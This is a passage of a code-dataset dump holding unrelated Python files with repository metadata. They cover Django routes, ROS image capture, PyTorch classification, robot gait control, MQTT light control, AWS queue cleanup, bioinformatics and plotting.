import path\nfrom .views import Home, FullVacante, MiPerfil, HomeFiltered, BorrarVacante\n\nurlpatterns = [\n    path(\"\", Home.as_view(), name=\"home\"),\n    path(\"vacante/\", FullVacante.as_view(), name=\"vacante\"),\n    path(\"vacantes/\", HomeFiltered.as_view(), name=\"filter\"),\n    path(\"perfil/\", MiPerfil.as_view(), name=\"perfil\"),\n    path(\"delete/<int:pk>/\", BorrarVacante, name=\"delete\")  # NOTE: <int:pk> is an assumed converter\n]","repo_name":"MVNdev/unijoblink","sub_path":"apps/vacantes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70847829314","text":"import rospy, cv2\nfrom sensor_msgs.msg import Image\nimport os\nimport sys\n\nsys.path.append(os.path.expanduser(\"~/catkin_workspace/install/lib/python3/dist-packages/\"))\nimport cv_bridge\n\n\nclass Follower:\n    def __init__(self):\n        self.bridge = cv_bridge.CvBridge()\n        # cv2.namedWindow(\"window\", 1)\n        self.image_sub = rospy.Subscriber('/camera/zed/rgb/image_rect_color',\n                                          Image, self.image_callback)\n        self.num1 = 68\n        self.num2 = 68\n\n    def image_callback(self, msg):\n        self.image = self.bridge.imgmsg_to_cv2(msg, desired_encoding='bgr8')\n        cv2.imshow(\"pic\", self.image)\n        k = cv2.waitKey(3)\n        if k == 27:  # press Esc to quit\n            cv2.destroyAllWindows()\n\n        elif k == ord('r'):  # press 'r' to save a red sample\n            self.num1 += 1\n            cv2.imwrite(\"./red/\" + str(self.num1) + \".jpg\", self.image)\n            print(\"Red image saved: \" + str(self.num1) + \".jpg\")\n\n        elif k == ord('g'):  # press 'g' to save a green sample\n            self.num2 += 1\n            cv2.imwrite(\"./green/\" + str(self.num2) + \".jpg\", self.image)\n            print(\"Green image saved: \" + str(self.num2) + \".jpg\")\n\n\nif __name__ == '__main__':\n    rospy.init_node('follower')\n    follower = Follower()\n    rospy.spin()","repo_name":"xmy0916/paddleDetectLightInROS","sub_path":"src/prtSc.py","file_name":"prtSc.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"37728792962","text":"from model import ClassifierModel, Data\nfrom imports import *\n\ndef view_classify(img, ps):\n    \n    classes = ['buildings', 'forest', 'glacier', 'mountain', 'sea', 'street']\n\n    ps = ps.data.cpu().numpy().squeeze()\n    img = img.numpy().transpose(1,2,0)\n    \n    fig, (ax1, ax2) = plt.subplots(figsize=(10,8), ncols=2)\n    ax1.imshow(img)\n    ax1.axis('off')\n    ax2.barh(classes, ps)\n    ax2.set_aspect(0.1)\n    ax2.set_yticks(classes)\n    ax2.set_yticklabels(classes)\n    ax2.set_title('Class Probability')\n    ax2.set_xlim(0, 1.1)\n\n    plt.tight_layout()\n    plt.savefig(\"output.jpg\")\n\n    return None\n    \nif __name__ == \"__main__\":\n    \n    \n    DEVICE = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n    TRAIN_DIR = \"ENTER-TRAINING-DIRECTORY\"  # placeholder: set to your training data directory\n    VAL_DIR = \"ENTER-VALIDATION-DIRECTORY\"  # placeholder: set to your validation data directory\n    BATCH_SIZE = 32  # NOTE: assumed value; BATCH_SIZE was referenced but never defined\n    \n    model = ClassifierModel().to(DEVICE)\n    model.load_state_dict(torch.load(\"/content/best-weights.pt\"))\n    trainLoader, valLoader, trainset, validset = Data(train_dir=TRAIN_DIR, val_dir=VAL_DIR, batch_size=BATCH_SIZE).load()\n\n    image, label = validset[np.random.randint(0, len(validset))]\n\n    image = image.unsqueeze(0)\n    logits = model(image.to(DEVICE))\n    probs = nn.Softmax(dim=1)(logits)\n\n    view_classify(image.squeeze(), probs)\n","repo_name":"niyarrbarman/transfer-learning-intel-clf","sub_path":"model/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23441016731","text":"t = int(input())\n\nfor i in range(1, t + 1):\n    s = []\n    N = int(input())\n\n    
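# Sketch of the approach: each string is collapsed into runs of equal\n    # characters; every string must then share the same sequence of run\n    # letters, and the answer sums (max - min) run lengths over all runs.\n    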
for j in range(N):\n s.append(input())\n\n for j in range(N):\n temp = list(s[j])\n k = 0\n length = len(temp)\n while k < length - 1 :\n if(temp[k][0] == temp[k+1][0]):\n temp[k] = temp[k] + temp[k+1]\n temp.pop(k+1)\n length -= 1\n k -= 1\n k += 1\n s[j] = temp\n\n temp = s[0]\n indices = range(len(temp))\n max_steps = [0 for x in indices]\n min_steps = [100000 for x in indices]\n flag = True\n for j in s:\n if len(temp) == len(j):\n for k in indices:\n if j[k][0] != temp[k][0]:\n flag = False\n break\n max_steps[k] = max(len(j[k]), max_steps[k])\n min_steps[k] = min(len(j[k]), min_steps[k])\n else:\n flag = False\n break\n if flag:\n print(\"Case #\" + str(i) + \":\", sum(max_steps) - sum(min_steps))\n else:\n print(\"Case #\" + str(i) + \": Fegla Won\")\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_142/844.py","file_name":"844.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40066249567","text":"\"\"\"\n$ python run_walk_experiment.py \n sample < 0: use reference trajectory (pypot_traj1.pkl)\n 0 <= sample < 100: use perturbed trajectory (pypot_sample_trajectory_.pkl)\n 100 <= sample: use updated trajectory (pypot_traj_star.pkl)\nsaves output data as\n walk_samples/results_.pkl\n walk_samples/frames.pkl (overwrites previous run due to storage limitations)\n\"\"\"\nimport sys\nimport pickle as pk\nimport numpy as np\nimport poppy_wrapper as pw\ntry:\n from pypot.creatures import PoppyHumanoid as PH\n from pypot.sensor import OpenCVCamera\n import pypot.utils.pypot_time as time\nexcept:\n from mocks import PoppyHumanoid as PH\n from mocks import OpenCVCamera\n import time\n\n# for python 2.7 on poppy\nif hasattr(__builtins__, 'raw_input'):\n input=raw_input\n\n# [0, 3, 4, 5, 2, 6, 8, 9, 1, 7]\n# [8, 4, 0, 3, 6, 9, 5, 1, 7, 2]\n# [3, 8, 7, 5, 4,||| 1,||| 2, 6, 9, 0]\n\nsample = int(sys.argv[1])\n\nsave_images = True\nif save_images:\n poppy = pw.PoppyWrapper(PH(), OpenCVCamera(\"poppy-cam\", 0, 24))\n binsize = 5\nelse:\n poppy = pw.PoppyWrapper(PH())\n binsize = None\n \n# load planned trajectory\nif sample < 0:\n with open('pypot_traj1.pkl', \"rb\") as f: trajs = pk.load(f)\nelif sample >= 100:\n with open('pypot_traj_star.pkl', \"rb\") as f: trajs = pk.load(f)\nelse:\n with open('walk_samples/pypot_sample_trajectory_%d.pkl' % sample, \"rb\") as f: trajs = pk.load(f)\n\n# get initial angles\n_, init_angles = trajs[0][0]\n\n# PID tuning\nK_p, K_i, K_d = 20.0, 0.0, 0.0\nfor m in poppy.motors:\n if hasattr(m, 'pid'): m.pid = (K_p, K_i, K_d)\n\ninput('[Enter] to turn off compliance')\npoppy.comply(False)\n\ninput('[Enter] for init angles (may want to hold up by strap)')\n\npoppy.goto_position(init_angles, duration=1, bufsize=10, speed_ratio=-1) # don't abort for speed\n\ninput('[Enter] to begin walking')\n\nnum_cycles, stop_traj = 1, 5 # one step, return to init\nif np.abs(sample) >= 100:\n num_cycles = 10\n stop_traj = len(trajs)\n\nbufs = []\nvids = []\nsuccess = True\nfor cycle in range(num_cycles):\n for t, traj in enumerate(trajs[:stop_traj]):\n \n # settle briefly at waypoint\n # if t not in [3]: # don't wait before kick\n # time.sleep(0.1)\n if t not in [2]: # don't wait after swing\n traj = traj + ((0.1, traj[-1][1]),)\n \n bufs.append([])\n vids.append([])\n for s, (duration, angles) in enumerate(traj[1:]): # skip (0, start)\n buf = poppy.goto_position(angles, duration, bufsize=10, speed_ratio=-1, binsize=binsize)\n vid = 
buf[1].pop('images')\n bufs[-1].append(buf)\n vids[-1].append(vid)\n success = buf[0]\n print(' success = %s' % str(success))\n if not success: break\n if not success: break\n\n # wait at final pose for stability\n if success:\n print('settling into init...')\n # time.sleep(3)\n buf = poppy.goto_position(angles, duration=3, bufsize=10, speed_ratio=-1, binsize=binsize)\n vid = buf[1].pop('images')\n bufs[-1].append(buf)\n vids[-1].append(vid)\n success = buf[0]\n print(' success = %s' % str(success))\n if not success: break\n\n # check for next step\n if num_cycles > 1:\n cmd = input('[Enter] for next step, [q] to abort: ')\n if cmd == 'q': break\n\ninput('[Enter] to return to rest and go compliant (may want to hold up by strap)')\npoppy.goto_position({name: 0. for name in poppy.motor_names}, 3, bufsize=10, speed_ratio=-1)\npoppy.comply()\n\nprint(\"closing...\")\npoppy.close()\nprint(\"closed.\")\n\nwhile True:\n try:\n if num_cycles == 1:\n print(\"How far did Poppy get?\")\n print(\"0 - nowhere\")\n print(\"1 - to shift\")\n print(\"2 - to push\")\n print(\"3 - to kick\")\n print(\"4 - all the way\")\n result = int(input(\"Enter the result: \"))\n assert result in [0,1,2,3,4]\n break\n else:\n print(\"How many steps did Poppy get?\")\n result = int(input(\"Enter the result: \"))\n assert result in list(range(0, 2*num_cycles+1))\n break\n except:\n print(\"Invalid input.\")\n\nwith open('walk_samples/results_%d.pkl' % sample, \"wb\") as f:\n pk.dump((poppy.motor_names, result, bufs), f)\n\n# overwrite frame file every time due to limited storage space on chip\nwith open('walk_samples/frames.pkl', \"wb\") as f:\n pk.dump(vids, f)\n\n","repo_name":"garrettkatz/poppy-muffin","sub_path":"scripts/run_walk_experiment.py","file_name":"run_walk_experiment.py","file_ext":"py","file_size_in_byte":4468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71113204354","text":"# This Python script uses the MQTT (Message Queuing Telemetry Transport) protocol to communicate between a motion sensor device and a light control system.\r\n# The script consists of two parts: one for the motion sensor device (motionDevice.py) and one for the light control system (lightControl.py).\r\n\r\n#This is the second part of the script (lightControl.py), which runs on the light control system.\r\n\r\n\r\n\r\n#Import libraries\r\nimport paho.mqtt.client as mqtt #for MQTT protocol\r\nimport json #to convert the python dictionary into a JSON string that can be written into a file\r\n\r\n# Set up the initial state of the light\r\nlight_state = \"off\"\r\n\r\n# Define the on_connect and on_message functions for the MQTT client\r\ndef on_connect(client, userdata, flags, rc):\r\n print(\"Connected to broker with result code \"+str(rc))\r\n\r\n # Subscribe to the \"motion_sensor\" and \"light_control\" topics\r\n client.subscribe(\"motion_sensor\")\r\n client.subscribe(\"light_control\")\r\n\r\ndef on_message(client, userdata, message):\r\n # Extract the topic and payload from the received message\r\n global light_state\r\n topic = message.topic\r\n payload = message.payload.decode()\r\n print(\"Received message: \"+payload+\" on topic: \"+topic)\r\n\r\n # If the message is from the motion sensor, check if motion was detected and turn on the light if it's currently off\r\n if topic == \"motion_sensor\":\r\n data = json.loads(payload)\r\n motion_detected = data[\"motion_detected\"]\r\n if motion_detected:\r\n print(\"Motion detected!\")\r\n if light_state == \"off\":\r\n 
client.publish(\"light_control\", \"on\")\r\n                print(\"Turning on the light.\")\r\n                light_state = \"on\"\r\n        else:\r\n            print(\"No motion detected.\")\r\n\r\n    # If the message is a light control message, update the state of the light accordingly\r\n    elif topic == \"light_control\":\r\n        if payload == \"on\":\r\n            print(\"Light turned on.\")\r\n            light_state = \"on\"\r\n        elif payload == \"off\":\r\n            print(\"Light turned off.\")\r\n            light_state = \"off\"\r\n\r\n# Create MQTT client instance\r\nclient = mqtt.Client()\r\n\r\n# Assign the on_connect and on_message functions to MQTT client instance\r\nclient.on_connect = on_connect\r\nclient.on_message = on_message # Set up callback function for message received event\r\n\r\n# Connect to the MQTT broker\r\nclient.connect(\"mqtt.eclipseprojects.io\") # a public test MQTT broker address/service \"https://mqtt.eclipseprojects.io/ \"\r\n\r\n\r\n# Topic subscriptions are handled in on_connect once the connection is up\r\n\r\n\r\n# Start the MQTT loop indefinitely to listen and handle messages\r\nclient.loop_forever()\r\n\r\n\r\n\r\n\r\n# CODE SUMMARY:\r\n\r\n# It starts by importing the required libraries, including the Paho MQTT client library and JSON, and defines the MQTT broker parameters,\r\n# sets up the initial state of the light, and defines the on_connect and on_message functions for the MQTT client.\r\n# The on_connect function is called when the client connects to the broker and subscribes to the \"motion_sensor\" and \"light_control\" topics.\r\n# The on_message function is called when the client receives a message, extracts the topic and payload from the received message,\r\n# and checks if the message is from the motion sensor or the light control system.\r\n# If the message is from the motion sensor, it checks if motion was detected and turns on the light if it's currently off.\r\n# If the message is a light control message, it updates the state of the light accordingly.\r\n# The script creates an MQTT client instance, assigns the on_connect and on_message functions to it, and connects to the MQTT broker.\r\n# The script then starts the MQTT loop indefinitely to listen and handle messages.","repo_name":"MUTEGIbeatrice/Group2-paho-mqtt","sub_path":"light/lightControl.py","file_name":"lightControl.py","file_ext":"py","file_size_in_byte":3779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40051583752","text":"import os\nimport cv2\n\nimport numpy as np\n\ndef xyxy2xywh(bbox,image_shape):\n    new_bbox = np.zeros_like(bbox)\n    new_bbox[:, 2] = np.absolute(bbox[:, 0] - bbox[:, 2]) / image_shape[1]\n    new_bbox[:, 3] = np.absolute(bbox[:, 1] - bbox[:, 3]) / image_shape[0]\n    new_bbox[:, 0] = (bbox[:, 0] + bbox[:, 2]) / (2 * image_shape[1])\n    new_bbox[:, 1] = (bbox[:, 1] + bbox[:, 3]) / (2 * image_shape[0])\n    return new_bbox\n\n\ndef filter_small_bounding_bboxes(data):\n    # drop boxes whose geometric-mean side length is 8 px or smaller\n    w = data[:, 0] - data[:, 2]\n    h = data[:, 1] - data[:, 3]\n    size = np.sqrt(w * h)\n    index = size > 8\n    return data[index]\n\n\ndef resize_img_bbox(img, bbox, base_size_w, base_size_h):\n    img_shape = img.shape\n    # cv2.resize expects dsize as (width, height)\n    img = cv2.resize(img, (base_size_w, base_size_h))\n    scale_h = base_size_h / img_shape[0]\n    scale_w = base_size_w / img_shape[1]\n    bbox[:, 0], bbox[:, 2] = bbox[:, 0] * scale_w, bbox[:, 2] * scale_w\n    bbox[:, 1], bbox[:, 3] = bbox[:, 1] * scale_h, bbox[:, 3] * scale_h\n    bbox = filter_small_bounding_bboxes(bbox)\n    bbox = xyxy2xywh(bbox, (base_size_h, base_size_w))\n    return img, bbox\n\n\ndir_list = 
['A1248','A11232', 'A3744', 'B1248','B11232', 'B3744', 'C1248','C11232', 'C3744','D1248', 'D11232', 'D3744']\nfor index, dir in enumerate(dir_list):\n    print(index)\n    new_dir = os.listdir(os.path.join('data', dir))\n    for file in new_dir:\n        if '.png' in file:\n            img = cv2.imread(os.path.join(os.path.join('data', dir), file))\n            bbox = np.loadtxt(os.path.join(os.path.join('data', dir), file.replace('.png', '.txt')), delimiter=',')[:,\n                   :4]\n            img, bbox = resize_img_bbox(img, bbox, 416, 416)\n            new_bbox = np.zeros((len(bbox), 5))\n            new_bbox[:, 1:] = bbox\n            new_img_name = dir + '_' + file\n            new_bbox_name = dir + '_' + file.replace('.png', '.txt')\n            new_path_img = os.path.join('moon_data/moon_yolo_v2/images', new_img_name)\n            new_path_bbox = os.path.join('moon_data/moon_yolo_v2/labels', new_bbox_name)\n            cv2.imwrite(new_path_img, img)\n            np.savetxt(new_path_bbox, new_bbox, delimiter=' ', fmt='%.4e')\n","repo_name":"acse-yl222/data_workflow","sub_path":"after_threshold.py","file_name":"after_threshold.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40890729185","text":"#!/usr/bin/env python3\n\n\"\"\"qubo2msa.py: Converts output from a D-Wave device or D-Wave simulator to an MSA.\"\"\"\n\nimport argparse\nimport numpy as np\nfrom Bio import SeqIO\nfrom bvc import BVC\n\n__author__ = \"Dan Mapleson, Luis Yanes, Katie Barr, Sophie Kirkwood and Tim Stitt\"\n__copyright__ = \"Copyright 2016, Quantum MSA\"\n__credits__ = [\"Dan Mapleson\", \"Luis Yanes\", \"Katie Barr\",\n               \"Sophie Kirkwood\", \"Tim Stitt\"]\n__license__ = \"GPLv3\"\n__version__ = \"0.0.1\"\n__maintainer__ = \"Dan Mapleson,\"\n__email__ = \"daniel.mapleson@earlham.ac.uk\"\n__status__ = \"Prototype\"\n\nclass Qubo2Msa:\n\n\t# active and target_energy default to empty/zero so the CLI entry point can omit them\n\tdef __init__(self, settings, solution, input, output, verbose, active=(), target_energy=0.0):\n\t\tself.data = []\n\t\tself.settings = settings\n\t\tself.solution = solution\n\t\tself.input = input\n\t\tself.output = output\n\t\tself.active = active\n\t\tself.verbose = verbose\n\t\tself.target_energy = target_energy\n\t\tself.otherbvm = None\n\n\tdef bvm(self, bvc):\n\t\tself.otherbvm = bvc\n\n\tdef run(self):\n\n\t\tbvc = BVC(settings_file=self.settings)\n\t\tprint(\"Loaded QUBO settings\")\n\t\tprint()\n\t\tbvc.load_bvs(self.solution, self.active)\n\t\tprint(\"Loaded solution to QUBO problem with\", len(self.active), \"binary variables (\", sum(self.active), \"of which are active
)\")\n\t\tprint()\n\t\tenergy = bvc.get_energy_from_file(self.solution)\n\t\tprint(\"Energy - Target:\", self.target_energy)\n\t\tprint(\"Energy - Actual:\", energy)\n\t\tprint(\"Tolerance: 0.5\")\n\t\tdiff = abs(energy - self.target_energy)\n\t\tif diff < 0.5:\n\t\t\tprint(\"Difference between actual and target energy is within tolerance:\", diff)\n\t\telse:\n\t\t\tprint(\"*****************************************************************************\")\n\t\t\tprint(\"WARNING: Difference between actual and target energy exceeds tolerance:\", diff)\n\t\t\tprint(\"WARNING: It is likely that the solution provided by the solver is not optimal\")\n\t\t\tprint(\"*****************************************************************************\")\n\n\t\tprint()\n\t\tprint(\"Loading input sequences into memory...\", end=\"\")\n\t\thandle = open(self.input, \"rU\")\n\t\trecords = list(SeqIO.parse(handle, \"fasta\"))\n\t\thandle.close()\n\t\tprint(\" done\")\n\t\tprint()\n\n\t\tif self.verbose:\n\t\t\tprint(\"Settings:\")\n\t\t\tprint(bvc)\n\t\t\tprint()\n\n\t\tmsa = bvc.make_msa()\n\t\tprint(\"Made MSA\")\n\n\t\tif self.verbose:\n\t\t\tprint()\n\t\t\tprint()\n\t\t\tprint(\"Solution variables:\")\n\t\t\tprint(bvc.getSolutionVars())\n\n\t\t\tprint(\"Solution shape:\")\n\t\t\tprint(bvc.getSolutionShape())\n\t\t\tprint()\n\t\t\tprint()\n\n\t\t\t#if self.otherbvm:\n\t\t\t#\tx=np.reshape(np.asarray(bvc.getSolutionVars()), newshape=(1,len(bvc.getSolutionVars())))\n\t\t\t#\tself.otherbvm.sophiesMethod(x)\n\n\t\tprint(\"Position variables:\")\n\t\tprint(bvc.getPosSolution())\n\t\tprint()\n\t\tprint(\"Position matrix:\")\n\t\tfor sa in msa:\n\t\t\tprint(sa)\n\n\t\tprint()\n\t\tprint(\"Gap variables:\")\n\t\tprint(bvc.getGapSolution())\n\n\t\tgm = bvc.make_gap_matrix()\n\t\tprint()\n\t\tprint(\"Gap matrix:\")\n\t\tfor g in gm:\n\t\t\tprint(g)\n\n\t\t# Shouldn't need this when run on the real thing but for now on random data M is not necesarily sufficient to\n\t\t# hold the potential position values\n\t\twidth = 2 ** bvc.m()\n\n\t\tprint()\n\t\tprint(\"MSA:\")\n\t\tss = [[\" \" for x in range(width)] for x in range(bvc.N())]\n\n\t\tfor i in range(bvc.N()):\n\t\t\tsa = msa[i]\n\t\t\trec = records[i]\n\t\t\tif not len(sa) == len(rec):\n\t\t\t\tprint(\"ERROR\")\n\t\t\t\texit(1)\n\n\t\t\tfor j in range(len(sa)):\n\t\t\t\tpos = sa[j]\n\t\t\t\tbase = rec.seq[j]\n\t\t\t\tss[i][pos] = base\n\n\t\tfor i in range(bvc.N()):\n\t\t\tfor j in range(width):\n\t\t\t\tprint(ss[i][j], end=\"\")\n\t\t\tprint()\n\n\n\ndef main():\n\tparser = argparse.ArgumentParser(\"Convert QUBO output (for now a list of line separated 0's and 1's) into an MSA\")\n\tparser.add_argument(\"settings\", help=\"The file containing settings used to generate the QUBO problem\")\n\tparser.add_argument(\"bv\", help=\"The file containing solved QUBO binary variables\")\n\tparser.add_argument(\"input\", help=\"The original input file in Fasta format\")\n\tparser.add_argument(\"-o\", \"--output\", help=\"The output file, containing the solved MSA\")\n\tparser.add_argument(\"-v\", \"--verbose\", action='store_true', default=False, help=\"Display extra information\")\n\targs = parser.parse_args()\n\n\tq2m = Qubo2Msa(settings = args.settings, solution=args.bv, input=args.input, output=args.output, verbose=args.verbose)\n\tq2m.run()\n\nif __name__ == \"__main__\":\n # stuff only to run when not called via 'import' here\n 
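# Example invocation (hypothetical file names):\n\t#   python qubo2msa.py settings.json solution.bv sequences.fasta -o out.msa -v\n\t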
main()\n","repo_name":"maplesond/msa2qubo","sub_path":"qubo2msa.py","file_name":"qubo2msa.py","file_ext":"py","file_size_in_byte":4262,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"3143761554","text":"import json\nimport boto3\n\nsqs = boto3.client('sqs')\nlmb = boto3.client('lambda')\n\ndef lambda_handler(event, context):\n    connection_id = event[\"requestContext\"][\"connectionId\"][:-1]\n\n    queues = sqs.list_queues(QueueNamePrefix=connection_id)\n    if \"QueueUrls\" in queues:\n        for url in queues[\"QueueUrls\"]:\n            queue_arn = sqs.get_queue_attributes(\n                QueueUrl=url,\n                AttributeNames=[\"QueueArn\"]\n            )[\"Attributes\"][\"QueueArn\"]\n\n            # Delete mapping (for output queue only)\n            out_queue_mappings = lmb.list_event_source_mappings(\n                EventSourceArn=queue_arn,\n                FunctionName=\"runnable-output\"\n            )[\"EventSourceMappings\"]\n\n            try:\n                for mapping in out_queue_mappings:\n                    lmb.delete_event_source_mapping(UUID=mapping[\"UUID\"])\n            except lmb.exceptions.ResourceInUseException:\n                print(\"Mapping still creating or updating\")\n\n            # Delete queue\n            sqs.delete_queue(QueueUrl=url)\n    \n    return {\n        'statusCode': 200,\n        'body': json.dumps('Hello from Lambda!')\n    }\n","repo_name":"team-stack-underflow/lambdas","sub_path":"disconnect/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"710164220","text":"from collections import defaultdict\nimport pandas as pd\n\n# def get_predictions(model, user, movies, k):\n#     movies['user'] = user\n#     preds = movies.apply(lambda x: model.predict(x[0], x[-1]), 1, result_type='expand')\n#     idx = preds[3].argsort()[:k]\n#     ids = preds.iloc[idx, 0]\n#     mvs = movies.movieId.isin(ids)\n#     return movies.loc[mvs, ['title', 'genres']]\n\ndef get_top_n(predictions, n=10):\n    \"\"\"Return the top-N recommendation for each user from a set of predictions.\n\n    Args:\n        predictions(list of Prediction objects): The list of predictions, as\n            returned by the test method of an algorithm.\n        n(int): The number of recommendations to output for each user. Default\n            is 10.\n\n    Returns:\n    A dict where keys are user (raw) ids and values are lists of tuples:\n        [(raw item id, true rating, rating estimation), ...] 
of size n.\n    \"\"\"\n\n    # First map the predictions to each user.\n    top_n = defaultdict(list)\n    for uid, iid, true_r, est, _ in predictions:\n        top_n[uid].append((iid, true_r, est))\n\n    # Then sort the predictions for each user and retrieve the k highest ones.\n    for uid, user_ratings in top_n.items():\n        user_ratings.sort(key=lambda x: x[2], reverse=True)\n        top_n[uid] = user_ratings[:n]\n\n    return top_n\n\n\ndef get_item_details(predictions, items, idcol, collist):\n\n    ids = [int(x[0]) for x in predictions]\n    tru_r = [x[1] for x in predictions]\n    est_r = [x[2] for x in predictions]\n    df = pd.DataFrame({idcol: ids, 'tru_r': tru_r, 'est_r': est_r})\n    # mvs = movies.movieId.isin(ids)\n    items = items.loc[items[idcol].isin(ids), collist]\n\n    return items.merge(df, on=idcol)","repo_name":"prateek-ponnuru/Recsys","sub_path":"utils/predictions.py","file_name":"predictions.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40918621799","text":"from auto import Auto\r\n\r\nclass Moto(Auto):\r\n    tamaño = float\r\n    retro = bool\r\n    marcha = int\r\n    \r\n    def __init__(self, marca, modelo, placa, matricula, potencia, airbag,tamaño,retro,marcha):\r\n        super().__init__(marca, modelo, placa, matricula, potencia, airbag)\r\n        self.tamaño = tamaño\r\n        self.retro = retro\r\n        self.marcha = marcha\r\n    \r\n    def mejor(self,transporte):\r\n        return f'This {self.modelo} from brand {self.marca} is better than the {transporte.modelo} from brand {transporte.marca} because it has {self.marcha} gears' ","repo_name":"Bsteven593/exam1","sub_path":"P1/motos.py","file_name":"motos.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"69986876034","text":"import sys\n\nmasses = [\n    57, 71, 87, 97, 99,\n    101, 103, 113, 114, 115,\n    128, 129, 131, 137, 147,\n    156, 163, 186\n]\n\n\ndef expand(ps):\n    for peptide in ps.copy():\n        ps.remove(peptide)\n        for m in masses:\n            if peptide:\n                new_peptide = peptide + '-' + str(m)\n            else:\n                new_peptide = str(m)\n            ps.add(new_peptide)\n    return ps\n\n\ndef mass(peptide):\n    m = sum(map(int, peptide.split('-')))\n    return m\n\n\ndef cyclospectrum(peptide):\n    cs = [0]\n    composition = list(map(int, peptide.split('-')))\n    n = len(composition)\n    for k in range(1, n):\n        for i in range(n):\n            if i + k <= n:\n                cs.append(sum(composition[i:i+k]))\n            else:\n                r = i + k - n\n                cs.append(sum(composition[i:] + composition[:r]))\n    cs.append(mass(peptide))\n    cs.sort()\n    return cs\n\n\ndef linear_spectrum(peptide):\n    cs = [0]\n    composition = list(map(int, peptide.split('-')))\n    n = len(composition)\n    for k in range(1, n):\n        for i in range(n - k + 1):\n            cs.append(sum(composition[i:i+k]))\n    cs.append(mass(peptide))\n    cs.sort()\n    return cs\n\n\ndef not_consistent(peptide, spectrum):\n    peptide_spectrum = linear_spectrum(peptide)\n    for value in peptide_spectrum:\n        if value not in spectrum:\n            return True\n    return False\n\n\ndef cyclopeptide_sequencing(spectrum):\n    peptides = {''}\n    matches = set()\n    parent_mass = max(spectrum)\n    while peptides:\n        peptides = expand(peptides)\n        for peptide in peptides.copy():\n            if mass(peptide) == parent_mass:\n                if cyclospectrum(peptide) == spectrum:\n                    matches.add(peptide)\n                peptides.remove(peptide)\n            elif not_consistent(peptide, spectrum):\n                peptides.remove(peptide)\n    return matches\n\n\ndef main():\n    spectrum = list(map(int, sys.stdin.readline().split()))\n    
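# For the sample spectrum \"0 113 128 186 241 299 314 427\" this prints the\n    # six cyclic rotations/reflections of 186-128-113 (order may vary because\n    # a set is used).\n    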
print(*cyclopeptide_sequencing(spectrum))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Leoberium/BA","sub_path":"Chapter4/BA4E.py","file_name":"BA4E.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40638740872","text":"#!/usr/bin/env python3\n\n\"\"\"Plots data associated with Elastica simulations\n\nUsed to reproduce various figures and renderings (in-part)\nfrom the paper:\nModeling and simulation of complex dynamic musculoskeletal architectures\nNature Communications, 2019\n\"\"\"\n__license__ = \"MIT License, see LICENSE for details\"\n__copyright__ = \"Copyright (C) 2019 MattiaLab\"\n\n# System imports\nimport argparse\nimport os\nimport sys\nfrom itertools import tee\n\nimport matplotlib.style as mplstyle #\nimport numpy as np #\nfrom matplotlib import pyplot as plt #\nfrom matplotlib.colors import to_rgb\nfrom matplotlib.patches import FancyArrowPatch\nfrom mpl_toolkits.mplot3d import proj3d\nfrom mpl_toolkits.mplot3d.art3d import Line3DCollection #\nfrom scipy.linalg import norm #\n\n# set the backend first\n# import matplotlib # isort:skip\n# matplotlib.use(\"TkAgg\") # isort:skip\n# from matplotlib.collections import LineCollection #\n\n\n# Turned off because slow\n# plt.rcParams['text.usetex'] = 'True'\n# plt.rcParams['font.serif'] = 'Fira Sans'\nplt.rcParams[\"font.size\"] = 14\nplt.rcParams[\"axes.labelsize\"] = 14\nplt.rcParams[\"axes.labelweight\"] = \"bold\"\nplt.rcParams[\"axes.titlesize\"] = 16\nplt.rcParams[\"xtick.labelsize\"] = 12\nplt.rcParams[\"ytick.labelsize\"] = 12\nmplstyle.use(\"seaborn-whitegrid\")\n# plt.rc('grid', color='#397939', linewidth=1, linestyle='--')\n\n\ndef pairwise(iterable):\n \"s -> (s0,s1), (s1,s2), (s2, s3), ...\"\n first, second = tee(iterable)\n next(second, None)\n return zip(first, second)\n\n\ndef set_axes_equal(axis, data=None):\n \"\"\"Make axes of 3D plot have equal scale so that spheres appear as spheres,\n cubes as cubes, etc.. 
